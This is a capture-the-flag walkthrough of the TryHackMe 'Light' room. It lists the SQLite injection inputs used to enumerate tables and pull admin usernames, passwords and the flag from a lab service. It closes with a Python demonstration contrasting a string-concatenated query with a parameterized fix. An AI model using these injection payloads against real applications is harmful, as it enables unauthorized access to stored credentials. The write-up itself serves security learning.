TryHackMe Light Walkthrough
Welcome to the Light database application!
Mode: EASY
I am working on a database application called Light! Would you like to try it out?
If so, the application is running on port 1337. You can connect to it using nc 10.10.235.64 1337
You can use the username smokey in order to get started.
Room Link: Light THM
Everything seemed fine until the morning after I completed yesterday’s TryHackMe rooms and went to sleep. As the sun rose, I stumbled upon a partially completed writeup by my friend on the “Room Light” challenge on TryHackMe. Intrigued and motivated, I decided to take it on myself.
Setting my aim on capturing the flag, I fired up the machine and began my journey. But this wasn’t an easy challenge — it required precision, the right commands, and a well-constructed syntax to get anywhere.
Initial Discovery
The only thing that worked perfectly was the hint. Connecting with:
nc 10.10.235.64 1337
and entering smokey as the username returned a password:
vYQ5ngPpw8AdUmL
This clue set the stage for further enumeration.
Enumeration Phase
Running an Nmap scan revealed two open ports:
- 22 (SSH)
- 1337

At this point, I expected a standard workflow — gather data from port 1337, log in via SSH, and perform privilege escalation. However, this machine had its own twists and challenges, deviating from the typical path I anticipated.
Working through various commands and the errors they produced, I eventually discovered by trial and error that the query touched only two columns: username and password, nothing else.

Using the command:
smokey' OR 'a'='a
revealed a password:
tF8tj2o94WE4LKC
However, I wasn’t sure who the password belonged to, so I continued experimenting to find a more useful query.
The real progress began here. After more testing, I discovered a working query:
smokey' UNION SELECT name FROM sqlite_master WHERE type='table
This revealed a table name. Next, I identified the columns, which were crucial for further progress.

Next, I needed to retrieve the admin username. This was straightforward using the following command:
smokey' UNION SELECT username FROM admintable WHERE username LIKE '%'
The next task was to obtain the admin password. For this, the following command was used:
smokey' UNION SELECT password FROM admintable WHERE username = '{adminusername}'

Next, I assumed the discovered credentials would allow SSH login, but that turned out to be incorrect. To dig deeper, I checked for other entries in the username column. It revealed there were only two entries. This was done using the command:
smokey' UNION SELECT COUNT(username) FROM admintable WHERE '1
A quick realization struck me: since I already knew one username, excluding it with a != condition would return the other user’s password. Since there was only one remaining entry, I was confident it would lead to the flag. With a simple change to the previous command, the flag was revealed:
smokey' UNION SELECT password FROM admintable WHERE username != '{adminusername}'
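To show why the queries above work and what closes the hole, here is an added example that is not part of the original writeup or of the room’s code. It builds a small in-memory SQLite database, runs the writeup’s inputs through a lookup that concatenates user input into the SQL text, and runs the same inputs through a parameterized lookup. The admintable name comes from the page; the usertable, its rows, the row order and the placeholder credentials are constructed for this example.

```python
import sqlite3

# Constructed sample schema (an assumption, not the room's real schema):
# admintable is named on the page; usertable, the row order and the
# placeholder credentials are made up for this example.
SCHEMA = """
CREATE TABLE usertable (username TEXT, password TEXT);
CREATE TABLE admintable (username TEXT, password TEXT);
INSERT INTO usertable VALUES ('alice',  'example-user-pw');
INSERT INTO usertable VALUES ('smokey', 'vYQ5ngPpw8AdUmL');
INSERT INTO admintable VALUES ('admin-placeholder',    'example-admin-pw');
INSERT INTO admintable VALUES ('flaguser-placeholder', 'THM{example-flag}');
"""


def make_db():
    """Fresh in-memory SQLite database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, username):
    """The pattern the room exhibits: user input is concatenated straight into
    the SQL text, so quotes in the input change the query's structure.
    Returns the result values as a list, or a single 'error: ...' string when
    SQLite rejects the mangled statement (the writeup mentions hitting such
    errors while refining the input; echoing them to the client is what makes
    the probing possible)."""
    sql = "SELECT password FROM usertable WHERE username = '" + username + "'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError as exc:
        return ["error: " + str(exc)]


def lookup_safe(conn, username):
    """The fix: a parameterized query. The driver binds the input as a value,
    so quote characters and keywords inside it are never parsed as SQL."""
    sql = "SELECT password FROM usertable WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


if __name__ == "__main__":
    conn = make_db()
    probes = [
        "smokey",
        "smokey' OR 'a'='a",
        "smokey' UNION SELECT name FROM sqlite_master WHERE type='table",
        "smokey' UNION SELECT COUNT(username) FROM admintable WHERE '1",
        "smokey'",  # unbalanced quote: the concatenated query fails to parse
    ]
    for probe in probes:
        print(repr(probe))
        print("  vulnerable:", lookup_vulnerable(conn, probe))
        print("  safe:      ", lookup_safe(conn, probe))
```

Run it and compare the two columns of output: the concatenating lookup returns every row for the OR input, lists the table names from sqlite_master for the UNION input, and returns a parse error for the unbalanced quote, while the parameterized lookup treats each of those strings as a literal username and returns nothing. Parameterizing the query is the fix; suppressing the database error text from the client response is the second change worth making, since those errors are what guide the trial and error the writeup describes.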

Eureka! The room has been solved, and the flag has been captured. While the overall experience was enjoyable, hunting for the correct commands was quite frustrating until I finally found the right approach.
The restrictions and setups made gaining entry to the room slightly challenging.
In the end, this room taught me the value of methodical exploration and the importance of testing different angles when facing unexpected obstacles. It was a rewarding experience that reinforced key concepts in web application security.
Good luck with your next challenge! Feel free to reach out whenever you need help. See you next time! 👋